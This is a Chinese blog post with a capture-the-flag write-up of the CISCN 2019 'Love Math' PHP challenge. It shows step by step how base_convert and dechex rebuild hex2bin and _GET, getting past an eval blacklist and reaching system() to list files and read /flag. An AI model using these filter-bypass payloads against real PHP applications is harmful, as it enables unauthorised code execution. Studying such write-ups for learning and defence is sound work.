[CISCN 2019 初赛]Love Math(利用函数和进制转换构造hen2bin函数)

已于 2024-07-28 19:33:49 修改
阅读量327 收藏 7
点赞数 16
分类专栏: CTF web题目 文章标签: web安全
于 2024-07-28 19:18:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140753898
版权

这道题关键就在利用数学函数和进制转换来拼凑出字符串,然后利用eval执行拼凑的命令

代码中一个黑名单过滤下面这些符号

  • 空格 ( )
  • 制表符 (\t)
  • 回车符 (\r)
  • 换行符 (\n)
  • 单引号 (\')
  • 双引号 (")
  • 反引号 (```)
  • 方括号 (\[ 和 \])

然后白名单函数里边这种函数还有点用'base_convert', 'bindec',decbin', 'dechex

/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/这个正则过滤了

  • 不以字母或下划线开头的字符串
  • 包含除字母、数字、下划线或扩展ASCII字符以外的特殊字符的字符串
  • 包含空格或其他空白字符的字符串

简单来说就是不能用除了白名单里边以外的函数

php中可以利用变量的动态调用函数而达到执行函数的目的:例如:

$a = 'system';

$b = 'id';

$a($b)        //system(id)

这道RCE里边代码只有c接收参数,所以我们可以采取变量赋值的方式在url中构造一个payload:

?c=($_GET['a'])($_GET['b'])&a=exec&b=ls /

($_GET['a'])($_GET['b'])就等于$a$b即exec(ls /)

但是这里过滤了单引号,方括号,$_GET也不能直接使用,得想办法通过其他方法转换绕过

在php中有个hex2bin函数可以将十六进制字符转为二进制字符串,但是白名单里面没有此函数

36进制数使用的字符包括数字0-9和字母A-Z。具体来说:

  • 数字部分:0, 1, 2, 3, 4, 5, 6, 7, 8, 9
  • 字母部分:A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z

我们可以将36进制状态下的hex2bin转换为常用的十进制,再使用base_convert()函数将该十进制数转为三十六进制即可构造出hex2bin函数

36进制数“hex2bin”转换为10进制:
37907361743 

hex2bin:base_convert(37907361743,10,36)

然后我们再利用dechex将$_GET的十进制数转换为十六进制,再通过hex2bin转为字符串。

$_GET的十六进制为:245f474554

转换为十进制为:156217328980

$_GET:hex2bin(dechex(156217328980))=

base_convert(37907361743,10,36)(dechex(156217328980))

又因为限制长度80,我们把base_convert(37907361743,10,36)(dechex(156217328980))赋值给一个变量$sin,即$sin=base_convert(37907361743,10,36)(dechex(156217328980))

中括号被禁用我们用花括号{}

构造payload:?c=$sin=base_convert(37907361743,10,36)(dechex(156217328980));($sin){cos}($sin){tan}$cos=exec&tan=ls /

因为空格过滤了使用括号包裹

结果超长了

找个最短的当变量,再利用变量覆盖试试

这次只用_GET不加$,用变量覆盖调用,例子:

$var = "Hello";

$p = "var";

echo $$p; // 输出:Hello

_GET十六进制为5f474554,再转十进制为1598506324

之前直接$sin应该是把那一串代表hen2bin函数的东西输出来了,这里用变量覆盖调用

构造payload:?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=exec&cos=ls /

因为中间分号隔开了,所以可以用一次pi传递参数,但是使用exec函数发现输出有问题

查了一下:exec():这个函数执行外部程序并返回最后一行输出的字符串。它可以接收一个数组参数来获取所有的输出行。

换用system函数,payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=ls /

/发现flag

最终payload:

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

孤丞OVO
关注
  • 16
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle 五笔码函数,如何根据单元格汉字自动生成拼音码和五笔码
weixin_39934613的博客
04-02 1279
1)打开电子表格软件;2)执行工具--宏- VISUAL BASIC编辑器;3)插入--模块;4)在模块中输入相关代码;5)关闭VB编辑器;如此就OK了。例如:在A1单元格中有姓名:郑兴民,想在A2单元格中显示拼音"zheng xing min",只需要在A2单元格中输入“=pinyin(a1)",再按回车键。以上就是拼音函数的实现。附代码:Function PinYin(Hz As String...
mysql自定义函数多参数_MySQL数据库高级(二)——自定义函数
weixin_30273263的博客
01-18 1820
MySQL数据库高级(二)——自定义函数一、自定义函数简介自定义函数 (user-defined function UDF)是一种对MySQL扩展的途径,其用法和内置函数相同。自定义函数的两个必要条件:A、参数B、返回值(必须有)。函数可以返回任意类型的值。二、自定义函数的使用1、自定义函数语法CREATEFUNCTIONfunction_name(parameter_nametype,[pa...
用汇编实现二进制数和十六进制数的相互转换
weixin_44194299的博客
08-03 1万+
用汇编实现二进制数向十六进制数的转换 一、实现功能 1)实现二进制数向十六进制数的转换 2)实现十六进制数向二进制数的转换‘ 二、设计分析       汇编语言中,字符在机器中都是以ascii码的二进制格式存储,但是汇编语言写的时候常用十六进制,因此需要好好看看ascii码的十六进制表。      特别是进制转换一定要注意,机器中存储的是数的二进制数本身,而我们输入输出的是数的ascii码的值,因此注意对寄存器中数的加减操作。   &nb
python内置函数 hex()
ajiong314
07-08 4272
描述hex() 函数用于将10进制整数转换成16进制,以字符串形式表示。语法hex 语法:hex(x)参数说明:x -- 10进制整数返回值返回16进制数,以字符串形式表示。实例以下实例展示了 hex 的使用方法:>>>hex(255)'0xff'>>> hex(-42)'-0x2a'>>> hex(1L)'0x1L'>>> ...
继承关系中基类和子类构造函数的调用顺序
weixin_30614587的博客
07-14 878
首先回顾并讨论先有鸡还是先有蛋的问题在C++中将会是什么情况。如果编写: class Egg; class Hen { public: int n; Egg egg; Hen() { n=5; cout<<"Hen's con "<<n<<endl; } }; class...
汉字转换拼音函数
Mr.Yuan
05-10 1万+
汉字转换为拼音调用ConvertPinyin()函数, 参数为你要转换的汉字返回值就是转换后的拼音可以只返回首字母或者首字母大写的全拼拼音var phoneticTranscriptionObj = { "a": "\u554a\u963f\u9515", "ai": "\u57c3\u6328\u54ce\u5509\u54c0\u7691\u764c\u853c\u77ee\u8
Hello MySQL(八)——自定义函数
天山老妖
03-02 7107
一、自定义函数简介 自定义函数 (user-defined function UDF)是一种对MySQL扩展的途径,其用法和内置函数相同。 自定义函数的两个必要条件: A、参数 B、返回值(必须有)。函数可以返回任意类型的值。 二、自定义函数的使用 1、自定义函数语法 CREATEFUNCTIONfunction_name(parameter_nametype,[parameter_name type,...]) RETURNS{STRING|INTEGER|REAL} runtime...
PHP汉字转换拼音的函数代码
热门推荐
cs729298的博客
03-31 5万+
header('Content-Type: text/html; charset=UTF-8'); /** * 拼音工具类 * $isfirst true代表只要拼音的大写字母,否则就是全拼 */ class PinyinUtil { public static function convert($s, $isfirst = false) { static $
汉字转拼音函数 linux,oracle 汉字转拼音
weixin_42151305的博客
05-05 1005
1.要有创建过程、函数的权限-- grant create procedure to user;2.在命令窗口中,执行以下语句,创建包CREATE OR REPLACE package GetHZPY is-- Author : ADMINISTRATOR-- Created : 2006-10-8 上午 11:51:16-- Purpose : 获得汉字拼音编码-- Public type d...
JiuG.zip_2LB_HEN_JEH_jiuG是什么意思_jst
09-23
标题中的"JiuG.zip_2LB_HEN_JEH_jiuG是什么意思_jst"可能是一种混合了术语和关键词的命名方式,其中"JiuG"可能是某种算法或程序的缩写,而"2LB"、"HEN"、"JEH"可能是特定问题或类别的标识符。"jst"可能指的是...
Bin_Hex.exe-其它文档类资源
01-22
标题中的“Bin_Hex.exe”是一个可执行程序,主要用于实现二进制(bin)和十六进制(hex)文件格式之间的转换。在电子设计自动化(EDA)领域,尤其是在VHDL(Very High Speed Integrated Circuit Hardware ...
5.03 hen r2
08-10
标题“5.03 hen r2”指的是一个针对PSP(PlayStation Portable)掌上游戏机的自制系统软件更新,通常称为"Homebrew Enabler"或简称"HEN"。这个版本是5.03系统的定制固件,允许用户在原版5.03系统的基础上运行非官方...
PS3HEN:PS3 Homebrew ENabler [支持 4.84、4.85、4.86 和 4.87 HFW]
05-31
PS3HEN 3.0.2 stage0.bin 附加到实际的堆栈帧 已添加 MultiFW 支持。 [支持的固件] CEX HFW 4.84.2 CEX HFW 4.85.1 CEX HFW 4.86.1 CEX HFW 4.87.1 ** CFW 可用于测试,但不推荐使用** 变更日志----------- ...
bin转hex源码.zip
02-04
在"bin2hex.c"中,我们可以预期找到一个函数或者一系列的代码,它们实现了将二进制数据转换成十六进制字符串的功能。而"bin2hex.h"很可能是提供函数原型和相关的宏定义,方便其他C程序调用这些转换功能。 在"bin2...
“微软蓝屏”事件暴露了网络安全哪些问题?
Asunqingwen的博客
07-23 480
微软蓝屏事件虽然只是一次技术问题,但却暴露了当前网络安全中的诸多隐患,通过此次事件,我们应该深刻反思并采取相应措施,提升网络安全水平,保护用户和企业的信息安全。网络安全不仅仅是技术问题,更是一个系统工程,需要各方的共同努力。只有不断提升安全意识和防护能力,才能在瞬息万变的网络环境中立于不败之地。
Web安全:Web体系架构存在的安全问题和解决方室
程序员-张师傅
07-24 1484
Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。
【网络安全】构建稳固与安全的网络环境:从“微软蓝屏”事件中汲取的教训
最新发布
一位前行者的博客
07-24 492
微软蓝屏”事件不仅是一次技术故障,更是一次对全球IT基础设施韧性和安全性的深刻检验。通过这次事件,我们应深刻反思并采取行动,共同构建一个更加稳固和安全的网络环境。只有这样,我们才能确保数字技术真正为世界人民带来福祉,而不是成为威胁。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
轻舟已过万重山
07-23 282
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值